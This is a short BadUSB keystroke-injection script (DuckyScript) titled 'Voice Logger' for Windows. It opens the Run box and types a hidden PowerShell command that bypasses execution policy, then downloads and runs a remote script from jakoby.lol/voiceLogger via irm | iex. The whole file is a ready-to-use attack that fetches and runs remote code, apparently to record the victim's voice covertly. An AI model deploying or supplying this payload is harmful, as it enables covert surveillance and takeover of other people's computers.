REM ###########################################################
REM #                                                         |
REM # Title        : Voice Logger                   |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################

GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';irm jakoby.lol/voiceLogger | iex
ENTER